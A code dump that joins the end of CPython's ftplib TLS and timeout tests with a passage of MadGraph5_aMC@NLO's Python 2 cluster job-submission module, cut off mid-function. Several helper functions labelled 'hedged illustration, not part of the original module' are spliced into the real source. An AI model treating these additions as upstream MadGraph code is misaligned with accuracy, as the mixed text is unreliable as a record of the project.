self.assertRaises(ValueError, ftplib.FTP_TLS, keyfile=CERTFILE,
context=ctx)
self.assertRaises(ValueError, ftplib.FTP_TLS, certfile=CERTFILE,
context=ctx)
self.assertRaises(ValueError, ftplib.FTP_TLS, certfile=CERTFILE,
keyfile=CERTFILE, context=ctx)
self.client = ftplib.FTP_TLS(context=ctx, timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.auth()
self.assertIs(self.client.sock.context, ctx)
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
self.client.prot_p()
with self.client.transfercmd('list') as sock:
self.assertIs(sock.context, ctx)
self.assertIsInstance(sock, ssl.SSLSocket)
def test_ccc(self):
self.assertRaises(ValueError, self.client.ccc)
self.client.login(secure=True)
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
self.client.ccc()
self.assertRaises(ValueError, self.client.sock.unwrap)
@skipUnless(False, "FIXME: bpo-32706")
def test_check_hostname(self):
self.client.quit()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.check_hostname, True)
ctx.load_verify_locations(CAFILE)
self.client = ftplib.FTP_TLS(context=ctx, timeout=TIMEOUT)
# 127.0.0.1 doesn't match SAN
self.client.connect(self.server.host, self.server.port)
with self.assertRaises(ssl.CertificateError):
self.client.auth()
# exception quits connection
self.client.connect(self.server.host, self.server.port)
self.client.prot_p()
with self.assertRaises(ssl.CertificateError):
with self.client.transfercmd("list") as sock:
pass
self.client.quit()
self.client.connect("localhost", self.server.port)
self.client.auth()
self.client.quit()
self.client.connect("localhost", self.server.port)
self.client.prot_p()
with self.client.transfercmd("list") as sock:
pass
class TestTimeouts(TestCase):
def setUp(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(20)
self.port = support.bind_port(self.sock)
self.server_thread = threading.Thread(target=self.server)
self.server_thread.daemon = True
self.server_thread.start()
# Wait for the server to be ready.
self.evt.wait()
self.evt.clear()
self.old_port = ftplib.FTP.port
ftplib.FTP.port = self.port
def tearDown(self):
ftplib.FTP.port = self.old_port
self.server_thread.join()
# Explicitly clear the attribute to prevent dangling thread
self.server_thread = None
def server(self):
# This method sets the evt 3 times:
# 1) when the connection is ready to be accepted.
# 2) when it is safe for the caller to close the connection
# 3) when we have closed the socket
self.sock.listen()
# (1) Signal the caller that we are ready to accept the connection.
self.evt.set()
try:
conn, addr = self.sock.accept()
except socket.timeout:
pass
else:
conn.sendall(b"1 Hola mundo\n")
conn.shutdown(socket.SHUT_WR)
# (2) Signal the caller that it is safe to close the socket.
self.evt.set()
conn.close()
finally:
self.sock.close()
def testTimeoutDefault(self):
# default -- use global socket timeout
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
ftp = ftplib.FTP(HOST)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutNone(self):
# no timeout -- do not use global socket timeout
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
ftp = ftplib.FTP(HOST, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertIsNone(ftp.sock.gettimeout())
self.evt.wait()
ftp.close()
def testTimeoutValue(self):
# a value
ftp = ftplib.FTP(HOST, timeout=30)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutConnect(self):
ftp = ftplib.FTP()
ftp.connect(HOST, timeout=30)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutDifferentOrder(self):
ftp = ftplib.FTP(timeout=30)
ftp.connect(HOST)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutDirectAccess(self):
ftp = ftplib.FTP()
ftp.timeout = 30
ftp.connect(HOST)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
class MiscTestCase(TestCase):
def test__all__(self):
blacklist = {'MSG_OOB', 'FTP_PORT', 'MAXLINE', 'CRLF', 'B_CRLF',
'Error', 'parse150', 'parse227', 'parse229', 'parse257',
'print_line', 'ftpcp', 'test'}
support.check__all__(self, ftplib, blacklist=blacklist)
def test_main():
tests = [TestFTPClass, TestTimeouts,
TestIPv6Environment,
TestTLS_FTPClassMixin, TestTLS_FTPClass,
MiscTestCase]
thread_info = support.threading_setup()
try:
support.run_unittest(*tests)
finally:
support.threading_cleanup(*thread_info)
if __name__ == '__main__':
test_main()
|
cluster.py
|
################################################################################
# Copyright (c) 2009 The MadGraph5_aMC@NLO Development team and Contributors
#
# This file is a part of the MadGraph5_aMC@NLO project, an application which
# automatically generates Feynman diagrams and matrix elements for arbitrary
# high-energy processes in the Standard Model and beyond.
#
# It is subject to the MadGraph5_aMC@NLO license which should accompany this
# distribution.
#
# For more information, visit madgraph.phys.ucl.ac.be and amcatnlo.web.cern.ch
#
################################################################################
import subprocess
import logging
import os
import time
import re
import glob
import inspect
import sys
logger = logging.getLogger('madgraph.cluster')
try:
from madgraph import MadGraph5Error
import madgraph.various.misc as misc
except Exception, error:
if __debug__:
print str(error)
from internal import MadGraph5Error
import internal.misc as misc
pjoin = os.path.join
class ClusterManagmentError(MadGraph5Error):
pass
class NotImplemented(MadGraph5Error):
pass
multiple_try = misc.multiple_try
pjoin = os.path.join
def check_interupt(error=KeyboardInterrupt):
def deco_interupt(f):
def deco_f_interupt(self, *args, **opt):
try:
return f(self, *args, **opt)
except error:
try:
self.remove(*args, **opt)
except Exception:
pass
raise error
return deco_f_interupt
return deco_interupt
def store_input(arg=''):
def deco_store(f):
def deco_f_store(self, prog, argument=[], cwd=None, stdout=None, stderr=None, log=None,
input_files=[], output_files=[], required_output=[], nb_submit=0):
frame = inspect.currentframe()
args, _, _, values = inspect.getargvalues(frame)
args = dict([(i, values[i]) for i in args if i != 'self'])
id = f(self, **args)
if self.nb_retry > 0:
self.retry_args[id] = args
return id
return deco_f_store
return deco_store
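# --- Hedged illustration (not part of the original module) --------------------
# A minimal sketch of what @store_input() buys the cluster classes: the decorated
# submit2() records its own call arguments in self.retry_args keyed by the job id,
# so check_termination() can later resubmit with exactly the same arguments.
# The `my_cluster` object and job script below are hypothetical.
def _example_store_input_effect(my_cluster):
    job_id = my_cluster.submit2('run_job.sh', argument=['1'], cwd='/tmp',
                                required_output=['results.dat'])
    if my_cluster.nb_retry > 0:
        # the decorator stored the submission arguments for a possible retry
        saved = my_cluster.retry_args[job_id]
        assert saved['prog'] == 'run_job.sh'
    return job_id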
def need_transfer(options):
"""This function checks whether the input files need to be transferred
(copied/compressed) to the worker node, given the run options."""
if options['run_mode'] != 1 and options['cluster_temp_path'] is None:
return False
else:
return True
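# --- Hedged illustration (not part of the original module) --------------------
# How need_transfer() is typically consulted: transfer is skipped only when not
# running in cluster mode (run_mode != 1) and no cluster_temp_path is set; in
# every other case the inputs may have to be shipped to the worker's scratch
# area, i.e. the submit2() path is needed. The option values are hypothetical.
def _example_need_transfer_usage():
    options = {'run_mode': 1, 'cluster_temp_path': '/scratch/mg5'}
    if need_transfer(options):
        return 'use submit2 with input_files/output_files'
    return 'shared disk: plain submit() is enough'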
class Cluster(object):
"""Basic Class for all cluster type submission"""
name = 'mother class'
identifier_length = 14
def __init__(self,*args, **opts):
"""Init the cluster"""
self.submitted = 0
self.submitted_ids = []
self.finish = 0
self.submitted_dirs = [] #HTCaaS
self.submitted_exes = [] #HTCaaS
self.submitted_args = [] #HTCaaS
if 'cluster_queue' in opts:
self.cluster_queue = opts['cluster_queue']
else:
self.cluster_queue = 'madgraph'
if 'cluster_temp_path' in opts:
self.temp_dir = opts['cluster_temp_path']
else:
self.temp_dir = None
self.options = {'cluster_status_update': (600, 30)}
for key,value in opts.items():
self.options[key] = value
self.nb_retry = opts['cluster_nb_retry'] if 'cluster_nb_retry' in opts else 0
self.cluster_retry_wait = float(opts['cluster_retry_wait']) if 'cluster_retry_wait' in opts else 300
self.options = dict(opts)
self.retry_args = {}
# bookkeeping of jobs for packet-type (grouped) submission
self.packet = {}
self.id_to_packet = {}
def submit(self, prog, argument=[], cwd=None, stdout=None, stderr=None,
log=None, required_output=[], nb_submit=0):
"""How to make one submission. Return status id on the cluster."""
raise NotImplemented, 'No implementation of how to submit a job to cluster \'%s\'' % self.name
@store_input()
def submit2(self, prog, argument=[], cwd=None, stdout=None, stderr=None,
log=None, input_files=[], output_files=[], required_output=[],
nb_submit=0):
"""How to make one submission. Return status id on the cluster.
NO SHARE DISK"""
if cwd is None:
cwd = os.getcwd()
if not os.path.exists(prog):
prog = os.path.join(cwd, prog)
if not required_output and output_files:
required_output = output_files
if not hasattr(self, 'temp_dir') or not self.temp_dir or \
(input_files == [] == output_files):
return self.submit(prog, argument, cwd, stdout, stderr, log,
required_output=required_output, nb_submit=nb_submit)
if not input_files and not output_files:
# no input/output files, so no need for the submit2 machinery
return self.submit(prog, argument, cwd, stdout, stderr, log,
required_output=required_output, nb_submit=nb_submit)
if cwd is None:
cwd = os.getcwd()
if not os.path.exists(prog):
prog = os.path.join(cwd, prog)
temp_file_name = "sub." + os.path.basename(prog) + '.'.join(argument)
text = """#!/bin/bash
MYTMP=%(tmpdir)s/run$%(job_id)s
MYPWD=%(cwd)s
mkdir -p $MYTMP
cd $MYPWD
input_files=( %(input_files)s )
for i in ${input_files[@]}
do
cp -R -L $i $MYTMP
done
cd $MYTMP
echo '%(arguments)s' > arguments
chmod +x ./%(script)s
%(program)s ./%(script)s %(arguments)s
exit=$?
output_files=( %(output_files)s )
for i in ${output_files[@]}
do
cp -r $MYTMP/$i $MYPWD
done
# if [ "$exit" -eq "0" ]
# then
rm -rf $MYTMP
# fi
"""
dico = {'tmpdir' : self.temp_dir, 'script': os.path.basename(prog),
'cwd': cwd, 'job_id': self.job_id,
'input_files': ' '.join(input_files + [prog]),
'output_files': ' '.join(output_files),
'arguments': ' '.join([str(a) for a in argument]),
'program': ' ' if '.py' in prog else 'bash'}
# writing a new script for the submission
new_prog = pjoin(cwd, temp_file_name)
open(new_prog, 'w').write(text % dico)
misc.Popen(['chmod','+x',new_prog],cwd=cwd)
return self.submit(new_prog, argument, cwd, stdout, stderr, log,
required_output=required_output, nb_submit=nb_submit)
def cluster_submit(self, prog, argument=[], cwd=None, stdout=None, stderr=None,
log=None, input_files=[], output_files=[], required_output=[],
nb_submit=0, packet_member=None):
"""This function wraps the cluster submission in a cluster-independent way.
It should not be overridden (except for DAG-type submission)."""
id = self.submit2(prog, argument, cwd, stdout, stderr, log, input_files,
output_files, required_output, nb_submit)
if not packet_member:
return id
else:
if isinstance(packet_member, Packet):
self.id_to_packet[id] = packet_member
packet_member.put(id)
if packet_member.tag not in self.packet:
self.packet[packet_member.tag] = packet_member
else:
if packet_member in self.packet:
packet = self.packet[packet_member]
packet.put(id)
self.id_to_packet[id] = packet
return id
def control(self, me_dir=None):
"""Check the status of the jobs associated with directory me_dir.
Return (idle, run, finish, fail)."""
if not self.submitted_ids:
raise NotImplemented, 'No implementation of how to control the job status to cluster \'%s\'' % self.name
idle, run, fail = 0, 0, 0
for pid in self.submitted_ids[:]:
status = self.control_one_job(pid)
if status == 'I':
idle += 1
elif status == 'R':
run += 1
elif status == 'F':
self.finish +=1
self.submitted_ids.remove(pid)
else:
fail += 1
return idle, run, self.finish, fail
def control_one_job(self, pid):
"""Control the status of a single job from its cluster id."""
raise NotImplemented, 'No implementation of how to control the job status to cluster \'%s\'' % self.name
def get_jobs_identifier(self, path, second_path=None):
"""Build a unique run name for the jobs; it helps to identify the runs
in the controller of some clusters."""
if second_path:
path = os.path.realpath(pjoin(path, second_path))
elif not os.path.exists(path):
return path # job already done
if 'SubProcesses' in path:
target = path.rsplit('/SubProcesses',1)[0]
elif 'MCatNLO' in path:
target = path.rsplit('/MCatNLO',1)[0]
elif second_path:
target=path
logger.warning("cluster.get_jobs_identifier runs unexpectedly. This should be fine, but report this message if you have problems.")
elif 'PY8_parallelization' in path:
target = path.rsplit('/PY8_parallelization',1)[0]
else:
target = path
if target.endswith('/'):
target = target[:-1]
target = misc.digest(target)[-self.identifier_length:]
if not target[0].isalpha():
target = 'a' + target[1:]
return target
@check_interupt()
def wait(self, me_dir, fct, minimal_job=0, update_first=None):
"""Wait until all jobs are finished.
If minimal_job is set, return once idle + run drops below that number."""
mode = 1 # 0 is long waiting/ 1 is short waiting
nb_iter = 0
nb_short = 0
change_at = 5 # number of iteration from which we wait longer between update.
if update_first:
idle, run, finish, fail = self.control(me_dir)
update_first(idle, run, finish)
# useful shortcut for readability
longtime, shorttime = self.options['cluster_status_update']
nb_job = 0
if self.options['cluster_type'] == 'htcaas2':
me_dir = self.metasubmit(self)
while 1:
old_mode = mode
nb_iter += 1
idle, run, finish, fail = self.control(me_dir)
if nb_job:
if idle + run + finish + fail != nb_job:
nb_job = idle + run + finish + fail
nb_iter = 1 # some packets finished; avoid switching to long-waiting mode
else:
nb_job = idle + run + finish + fail
if fail:
raise ClusterManagmentError('Some Jobs are in a Hold/... state. Please try to investigate or contact the IT team')
if idle + run == 0:
#time.sleep(20) #security to ensure that the file are really written on the disk
logger.info('All jobs finished')
fct(idle, run, finish)
break
if idle + run < minimal_job:
return
fct(idle, run, finish)
# Determine how long we have to wait (mode=0 -> long time, mode=1 -> short time)
if nb_iter < change_at:
mode = 1
elif idle < run:
if old_mode == 0:
if nb_short:
mode = 0 # we already went back from short to long, so stay in long
#check if we need to go back to short mode
elif idle:
if nb_iter > change_at + int(longtime)//shorttime:
mode = 0 #stay in long waiting mode
else:
mode = 1 # pass in short waiting mode
nb_short =0
else:
mode = 1 # pass in short waiting mode
nb_short = 0
elif old_mode == 1:
nb_short +=1
if nb_short > 3* max(change_at, int(longtime)//shorttime):
mode = 0 #go back in slow waiting
else:
mode = 0
# if we pass from fast (mode=1) to slow (mode=0), print a notice:
if old_mode > mode:
logger.info('''Start to wait %ss between checking status.
Note that you can change this time in the configuration file.
Press ctrl-C to force the update.''' % self.options['cluster_status_update'][0])
#now Waiting!
if mode == 0:
try:
time.sleep(self.options['cluster_status_update'][0])
except KeyboardInterrupt:
logger.info('start to update the status')
nb_iter = min(0, change_at -2)
nb_short = 0
else:
time.sleep(self.options['cluster_status_update'][1])
self.submitted = 0
self.submitted_ids = []
def check_termination(self, job_id):
"""Check the termination of the job with job_id and relaunch it if needed."""
if job_id not in self.retry_args:
if job_id in self.id_to_packet:
nb_in_packet = self.id_to_packet[job_id].remove_one()
if nb_in_packet == 0:
# packet done run the associate function
packet = self.id_to_packet[job_id]
# fully ensure that the packet is finished (thread safe)
packet.queue.join()
#running the function
packet.fct(*packet.args)
del self.id_to_packet[job_id]
return 'resubmit'
else:
return True
args = self.retry_args[job_id]
if 'time_check' in args:
time_check = args['time_check']
else:
time_check = 0
for path in args['required_output']:
if args['cwd']:
path = pjoin(args['cwd'], path)
# check that file exists and is not empty.
if not (os.path.exists(path) and os.stat(path).st_size != 0) :
break
else:
# all requested output are present
if time_check > 0:
logger.info('Job %s Finally found the missing output.' % (job_id))
del self.retry_args[job_id]
self.submitted_ids.remove(job_id)
# check if the job_id is in a packet
if job_id in self.id_to_packet:
nb_in_packet = self.id_to_packet[job_id].remove_one()
if nb_in_packet == 0:
# packet done run the associate function
packet = self.id_to_packet[job_id]
# fully ensure that the packet is finished (thread safe)
packet.queue.join()
#running the function
packet.fct(*packet.args)
del self.id_to_packet[job_id]
return 'resubmit'
return 'done'
if time_check == 0:
logger.debug('''Job %s: missing output:%s''' % (job_id,path))
args['time_check'] = time.time()
return 'wait'
elif self.cluster_retry_wait > time.time() - time_check:
return 'wait'
#jobs failed to be completed even after waiting time!!
if self.nb_retry < 0:
logger.critical('''Fail to run correctly job %s.
with option: %s
file missing: %s''' % (job_id, args, path))
raw_input('press enter to continue.')
elif self.nb_retry == 0:
logger.critical('''Fail to run correctly job %s.
with option: %s
file missing: %s.
Stopping all runs.''' % (job_id, args, path))
self.remove()
elif args['nb_submit'] >= self.nb_retry:
logger.critical('''Fail to run correctly job %s.
with option: %s
file missing: %s
Fails %s times
No resubmission. ''' % (job_id, args, path, args['nb_submit']))
self.remove()
else:
args['nb_submit'] += 1
logger.warning('resubmitting job (attempt number %s)' % args['nb_submit'])
del self.retry_args[job_id]
self.submitted_ids.remove(job_id)
if 'time_check' in args:
del args['time_check']
if job_id in self.id_to_packet:
self.id_to_packet[job_id].remove_one()
args['packet_member'] = self.id_to_packet[job_id]
del self.id_to_packet[job_id]
self.cluster_submit(**args)
else:
self.submit2(**args)
return 'resubmit'
return 'done'
@check_interupt()
def launch_and_wait(self, prog, argument=[], cwd=None, stdout=None,
stderr=None, log=None, required_output=[], nb_submit=0,
input_files=[], output_files=[]):
"""launch one job on the cluster and wait for it"""
special_output = False # flag to concatenate stderr with stdout.
if stderr == -2 and stdout:
# We are supposed to send the error output to stdout
special_output = True
stderr = stdout + '.err'
id = self.submit2(prog, argument, cwd, stdout, stderr, log,
required_output=required_output, input_files=input_files,
output_files=output_files)
if self.options['cluster_type']=='htcaas2':
if self.submitted == self.submitted_ids[-1]:
id = self.metasubmit(self)
frame = inspect.currentframe()
args, _, _, values = inspect.getargvalues(frame)
args = dict([(i, values[i]) for i in args if i != 'self'])
self.retry_args[id] = args
nb_wait=0
while 1:
nb_wait+=1
status = self.control_one_job(id)
if not status in ['R','I']:
status = self.check_termination(id)
if status in ['wait']:
time.sleep(30)
continue
elif status in ['resubmit']:
id = self.submitted_ids[0]
time.sleep(30)
continue
#really stop!
time.sleep(30) # safety margin to ensure the files are really written to disk
break
time.sleep(self.options['cluster_status_update'][1])
if required_output:
# final safety check that all required output files are present
# (check_termination resubmits the job itself if needed)
self.check_termination(id)
if special_output:
# combine the stdout and the stderr
# wait up to 50 s for those files to exist
for i in range(5):
if os.path.exists(stdout):
if not os.path.exists(stderr):
time.sleep(5)
if os.path.exists(stderr):
err_text = open(stderr).read()
if not err_text:
return
logger.warning(err_text)
text = open(stdout).read()
open(stdout,'w').write(text + err_text)
else:
return
time.sleep(10)
def remove(self, *args, **opts):
"""Default implementation: job removal is not supported."""
logger.warning("""This cluster doesn't support job removal;
the jobs are still running on the cluster.""")
@store_input()
def metasubmit(self, me_dir):
logger.warning("""This cluster doesn't support metajob submission.""")
return 0
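# --- Hedged illustration (not part of the original module) --------------------
# Typical driver loop for any concrete Cluster subclass (condor/pbs/sge/lsf/...):
# submit the jobs, then block in wait() with a status callback. The cluster
# instance, script names and run directory below are hypothetical.
def _example_cluster_workflow(cluster, run_dir, scripts):
    for script in scripts:
        cluster.submit2(script, cwd=run_dir,
                        stdout='/dev/null', stderr='/dev/null',
                        required_output=['results.dat'])
    def report(idle, run, finish):
        logger.info('jobs: %s idle, %s running, %s done' % (idle, run, finish))
    # wait() polls control() until idle + run == 0, resubmitting failed jobs
    # (up to cluster_nb_retry times) through check_termination()
    cluster.wait(run_dir, report)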
class Packet(object):
"""An object for handling a packet of jobs; it is designed to be thread safe."""
def __init__(self, name, fct, args, opts={}):
import Queue
import threading
self.queue = Queue.Queue()
self.tag = name
self.fct = fct
self.args = args
self.opts = opts
self.done = threading.Event()
def put(self, *args, **opts):
self.queue.put(*args, **opts)
append = put
def remove_one(self):
self.queue.get(True)
self.queue.task_done()
return self.queue.qsize()
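# --- Hedged illustration (not part of the original module) --------------------
# How a Packet is meant to be paired with cluster_submit(): every job of the
# packet registers itself via packet_member, and once check_termination() has
# accounted for all of them the packet's function is called with packet.args.
# The cluster object, run directory and job list below are hypothetical.
def _example_packet_usage(cluster, run_dir, jobs):
    def combine(directory):
        logger.info('all jobs of the packet are done, combining in %s' % directory)
    packet = Packet('combine_%s' % run_dir, combine, (run_dir,))
    for prog, arguments in jobs:
        cluster.cluster_submit(prog, argument=arguments, cwd=run_dir,
                               packet_member=packet)
    return packet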
class MultiCore(Cluster):
"""Class for handling submission on a multicore machine (local worker threads)."""
job_id = "$"
def __init__(self, *args, **opt):
"""Init the cluster """
super(MultiCore, self).__init__(*args, **opt)
import Queue
import threading
import thread
self.queue = Queue.Queue() # list of jobs to do
self.done = Queue.Queue() # list of finished jobs
self.submitted = Queue.Queue() # one entry per submitted job
self.stoprequest = threading.Event() # flag used to ask everything to close
self.demons = []
self.nb_done =0
if 'nb_core' in opt:
self.nb_core = opt['nb_core']
elif isinstance(args[0],int):
self.nb_core = args[0]
else:
self.nb_core = 1
self.update_fct = None
self.lock = threading.Event() # allow nice lock of the main thread
self.pids = Queue.Queue() # allow to clean jobs submit via subprocess
self.done_pid = [] # pids of finished jobs
self.done_pid_queue = Queue.Queue()
self.fail_msg = None
# starting the worker node
for _ in range(self.nb_core):
self.start_demon()
def start_demon(self):
import threading
t = threading.Thread(target=self.worker)
t.daemon = True
t.start()
self.demons.append(t)
def worker(self):
import Queue
import thread
while not self.stoprequest.isSet():
try:
args = self.queue.get()
tag, exe, arg, opt = args
try:
# check for executable case
if isinstance(exe,str):
if os.path.exists(exe) and not exe.startswith('/'):
exe = './' + exe
if isinstance(opt['stdout'],str):
opt['stdout'] = open(opt['stdout'],'w')
if opt['stderr'] == None:
opt['stderr'] = subprocess.STDOUT
proc = misc.Popen([exe] + arg, **opt)
pid = proc.pid
self.pids.put(pid)
proc.wait()
if proc.returncode not in [0, 143, -15] and not self.stoprequest.isSet():
fail_msg = 'program %s launch ends with non zero status: %s. Stop all computation' % \
(' '.join([exe]+arg), proc.returncode)
logger.warning(fail_msg)
self.stoprequest.set()
self.remove(fail_msg)
# handle the case when this is a python function. Note that
# this uses threads, so there is NO built-in parallelization: it will
# run on a single core! (This is fine for IO-intensive functions;
# for CPU-intensive functions it will slow down the computation.)
else:
pid = tag
self.pids.put(pid)
# the function should return 0 if everything is fine
# the error message otherwise
returncode = exe(*arg, **opt)
if returncode != 0:
logger.warning("fct %s does not return 0. Stopping the code in a clean way. The error was:\n%s", exe, returncode)
self.stoprequest.set()
self.remove("fct %s does not return 0:\n %s" % (exe, returncode))
except Exception,error:
self.fail_msg = sys.exc_info()
logger.warning(str(error))
self.stoprequest.set()
self.remove(error)
if __debug__:
raise self.fail_msg[0], self.fail_msg[1],self.fail_msg[2]
self.queue.task_done()
self.done.put(tag)
self.done_pid_queue.put(pid)
# release the mother (main) thread so it can print the status on screen
try:
self.lock.set()
except thread.error:
continue
except Queue.Empty:
continue
def submit(self, prog, argument=[], cwd=None, stdout=None, stderr=None,
log=None, required_output=[], nb_submit=0):
"""submit a job on multicore machine"""
tag = (prog, tuple(argument), cwd, nb_submit)
if isinstance(prog, str):
opt = {'cwd': cwd,
'stdout':stdout,
'stderr': stderr}
self.queue.put((tag, prog, argument, opt))
self.submitted.put(1)
return tag
else:
# python function
self.queue.put((tag, prog, argument, {}))
self.submitted.put(1)
return tag
def launch_and_wait(self, prog, argument=[], cwd=None, stdout=None,
stderr=None, log=None, **opts):
"""launch one job and wait for it"""
if isinstance(stdout, str):
stdout = open(stdout, 'w')
if isinstance(stderr, str):
stderr = open(stderr, 'w')
return misc.call([prog] + argument, stdout=stdout, stderr=stderr, cwd=cwd)
def remove(self, error=None):
"""Ensure that all worker threads are stopped."""
# ask the workers to stop
self.stoprequest.set()
if error and not self.fail_msg:
self.fail_msg = error
# cleaning the queue done_pid_queue and move them to done_pid
while not self.done_pid_queue.empty():
pid = self.done_pid_queue.get()
self.done_pid.append(pid)
# self.done_pid_queue.task_done()
while not self.pids.empty():
pid = self.pids.get()
self.pids.task_done()
if isinstance(pid, tuple):
continue
if pid in self.done_pid:
continue
out = os.system('CPIDS=$(pgrep -P %(pid)s); kill -15 $CPIDS > /dev/null 2>&1' \
% {'pid':pid} )
out = os.system('kill -15 %(pid)s > /dev/null 2>&1' % {'pid':pid} )
def wait(self, me_dir, update_status, update_first=None):
"""Wait until all the jobs are done. This function also checks that
packet submissions are handled correctly (i.e. submits the packet function)."""
import Queue
import threading
try: # catch KeyboardInterrupt to decide which kind of error to display
last_status = (0, 0, 0)
sleep_time = 1
use_lock = True
first = True
while True:
force_one_more_loop = False # some security
# Loop over the jobs tagged as done to check whether a packet of jobs
# is finished; in that case, put the associated function in the queue
while self.done.qsize():
try:
tag = self.done.get(True, 1)
except Queue.Empty:
pass
else:
if self.id_to_packet and tuple(tag) in self.id_to_packet:
packet = self.id_to_packet[tuple(tag)]
remaining = packet.remove_one()
if remaining == 0:
# fully ensure that the packet is finished (thread safe)
packet.queue.join()
self.submit(packet.fct, packet.args)
force_one_more_loop = True
self.nb_done += 1
self.done.task_done()
# Get the Idle/Done/Running information from the various queues
# Those variables should be thread safe but are approximate.
Idle = self.queue.qsize()
Done = self.nb_done + self.done.qsize()
Running = max(0, self.submitted.qsize() - Idle - Done)
if Idle + Running <= 0 and not force_one_more_loop:
update_status(Idle, Running, Done)
# Going to quit since everything is done
# Fully Ensure that everything is indeed done.
self.queue.join()
break
if (Idle, Running, Done) != last_status:
if first and update_first:
update_first(Idle, Running, Done)
first = False
else:
update_status(Idle, Running, Done)
last_status = (Idle, Running, Done)
# cleaning the queue done_pid_queue and move them to done_pid
while not self.done_pid_queue.empty():
pid = self.done_pid_queue.get()
self.done_pid.append(pid)
self.done_pid_queue.task_done()
# Define how to wait for the next iteration
if use_lock:
# simply wait until a worker releases the lock
use_lock = self.lock.wait(300)
self.lock.clear()
if not use_lock and Idle > 0:
use_lock = True
else:
# to be sure that we never fully lock at the end, fall back to
# a simple time.sleep()
time.sleep(sleep_time)
sleep_time = min(sleep_time + 2, 180)
if update_first:
update_first(Idle, Running, Done)
if self.stoprequest.isSet():
if isinstance(self.fail_msg, Exception):
raise self.fail_msg
elif isinstance(self.fail_msg, str):
raise Exception, self.fail_msg
else:
misc.sprint(self.fail_msg)
raise self.fail_msg[0], self.fail_msg[1], self.fail_msg[2]
# reset variable for next submission
try:
self.lock.clear()
except Exception:
pass
self.done = Queue.Queue()
self.done_pid = []
self.done_pid_queue = Queue.Queue()
self.nb_done = 0
self.submitted = Queue.Queue()
self.pids = Queue.Queue()
self.stoprequest.clear()
except KeyboardInterrupt:
# if one of the nodes fails -> return that error
if isinstance(self.fail_msg, Exception):
raise self.fail_msg
elif isinstance(self.fail_msg, str):
raise Exception, self.fail_msg
elif self.fail_msg:
raise self.fail_msg[0], self.fail_msg[1], self.fail_msg[2]
# else re-raise the original error
raise
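# --- Hedged illustration (not part of the original module) --------------------
# MultiCore mirrors the Cluster interface but runs everything locally on
# nb_core worker threads; submit() accepts either an executable path or a
# python function. The script paths below are hypothetical.
def _example_multicore_usage(nb_core, scripts):
    mc = MultiCore(nb_core=nb_core)
    for script in scripts:
        mc.submit(script, argument=['1'], stdout='/dev/null')
    def report(idle, running, done):
        logger.info('%s idle / %s running / %s done' % (idle, running, done))
    mc.wait(None, report)
    return mc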
class CondorCluster(Cluster):
"""Basic class for dealing with cluster submission"""
name = 'condor'
job_id = 'CONDOR_ID'
@multiple_try()
def submit(self, prog, argument=[], cwd=None, stdout=None, stderr=None, log=None,
required_output=[], nb_submit=0):
"""Submit a job prog to a Condor cluster"""
text = """Executable = %(prog)s
output = %(stdout)s
error = %(stderr)s
log = %(log)s
%(argument)s
environment = CONDOR_ID=$(Cluster).$(Process)
Universe = vanilla
notification = Error
Initialdir = %(cwd)s
%(requirement)s
getenv=True
queue 1
"""
if self.cluster_queue not in ['None', None]:
requirement = 'Requirements = %s=?=True' % self.cluster_queue
else:
requirement = ''
if cwd is None:
cwd = os.getcwd()
if stdout is None:
stdout = '/dev/null'
if stderr is None:
stderr = '/dev/null'
if log is None:
log = '/dev/null'
if not os.path.exists(prog):
prog = os.path.join(cwd, prog)
if argument:
argument = 'Arguments = %s' % ' '.join(argument)
else:
argument = ''
dico = {'prog': prog, 'cwd': cwd, 'stdout': stdout,
'stderr': stderr,'log': log,'argument': argument,
'requirement': requirement}
#open('submit_condor','w').write(text % dico)
a = misc.Popen(['condor_submit'], stdout=subprocess.PIPE,
stdin=subprocess.PIPE)
output, _ = a.communicate(text % dico)
#output = a.stdout.read()
#Submitting job(s).
#Logging submit event(s).
#1 job(s) submitted to cluster 2253622.
pat = re.compile("submitted to cluster (\d*)",re.MULTILINE)
try:
id = pat.search(output).groups()[0]
except:
raise ClusterManagmentError, 'fail to submit to the cluster: \n%s' \
% output
self.submitted += 1
self.submitted_ids.append(id)
return id
@store_input()
@multiple_try()
def submit2(self, prog, argument=[], cwd=None, stdout=None, stderr=None,
log=None, input_files=[], output_files=[], required_output=[],
nb_submit=0):
"""Submit the job on the cluster NO SHARE DISK
input/output file should be give relative to cwd
"""
if not required_output and output_files:
required_output = output_files
if (input_files == [] == output_files):
return self.submit(prog, argument, cwd, stdout, stderr, log,
required_output=required_output, nb_submit=nb_submit)
text = """Executable = %(prog)s
output = %(stdout)s
error = %(stderr)s
log = %(log)s
%(argument)s
should_transfer_files = YES
when_to_transfer_output = ON_EXIT
transfer_input_files = %(input_files)s
%(output_files)s
Universe = vanilla
notification = Error
Initialdir = %(cwd)s
%(requirement)s
getenv=True
queue 1
"""
if self.cluster_queue not in ['None', None]:
requirement = 'Requirements = %s=?=True' % self.cluster_queue
else:
requirement = ''
if cwd is None:
cwd = os.getcwd()
if stdout is None:
stdout = '/dev/null'
if stderr is None:
stderr = '/dev/null'
if log is None:
log = '/dev/null'
if not os.path.exists(prog):
prog = os.path.join(cwd, prog)
if argument:
argument = 'Arguments = %s' % ' '.join([str(a) for a in argument])
else:
argument = ''
# input/output file treatment
if input_files:
input_files = ','.join(input_files)
else:
input_files = ''
if output_files:
output_files = 'transfer_output_files = %s' % ','.join(output_files)
else:
output_files = ''
